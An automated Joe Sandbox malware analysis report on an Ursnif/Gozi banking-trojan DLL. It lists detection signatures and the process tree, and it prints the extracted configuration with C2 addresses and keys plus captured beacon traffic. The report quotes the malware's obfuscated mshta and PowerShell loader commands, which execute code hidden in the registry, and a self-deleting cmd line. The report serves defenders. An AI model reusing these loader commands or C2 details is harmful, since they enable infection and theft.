Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VoevdOQpeU.dll

Overview

General Information

Sample Name:VoevdOQpeU.dll
Analysis ID:614287
MD5:ba155d8aed7ca303fcfc3f0248d218e1
SHA1:600453c21cdbecdbea9c825df4754b8a1829d649
SHA256:a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a
Tags:dllGoziISFBUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1428 cmdline: loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5292 cmdline: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6956 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 7132 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • WerFault.exe (PID: 3084 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6532 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6788 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6844 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4432 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 5388 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.48994a0.7.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.2.rundll32.exe.49f0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.48994a0.7.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.4e7a4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.4f26940.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Windows Shell File Write to Suspicious Folder
                      Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
                      Sigma detected: Accessing WinAPI in PowerShell. Code Injection
                      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6612, StartAddress: 2BC1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3616
                      Sigma detected: Suspicious Remote Thread Created
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6612, StartAddress: 2BC1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3616
                      Sigma detected: MSHTA Spawning Windows Shell
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1796, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, ProcessId: 5292, ProcessName: rundll32.exe
                      Sigma detected: Mshta Spawning Windows Shell
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6956, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 7132, ProcessName: rundll32.exe
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6612, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, ProcessId: 6788, ProcessName: csc.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6612, TargetFilename: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132951679509388866.6612.DefaultAppDomain.powershell
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6612, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6644, ProcessName: conhost.exe

                      Snort Signatures

                      Timestamp:04/23/22-08:12:19.910177 04/23/22-08:12:19.910177
                      SID:2033203
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/23/22-08:12:21.823792 04/23/22-08:12:21.823792
                      SID:2033203
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/23/22-08:11:59.593120 04/23/22-08:11:59.593120
                      SID:2033203
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/23/22-08:12:20.776897 04/23/22-08:12:20.776897
                      SID:2033203
                      Source Port:49766
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: VoevdOQpeU.dllReversingLabs: Detection: 38%
                      Machine Learning detection for sample
                      Source: VoevdOQpeU.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: VoevdOQpeU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.287938913.0000000000480000.00000002.00000001.01000000.00000003.sdmp, VoevdOQpeU.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05805A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

                      Networking

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49760 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49760 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49766 -> 146.70.35.138:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49766 -> 146.70.35.138:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 146.70.35.138 80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                      Source: Joe Sandbox ViewIP Address: 146.70.35.138 146.70.35.138
                      Source: global trafficHTTP traffic detected: GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
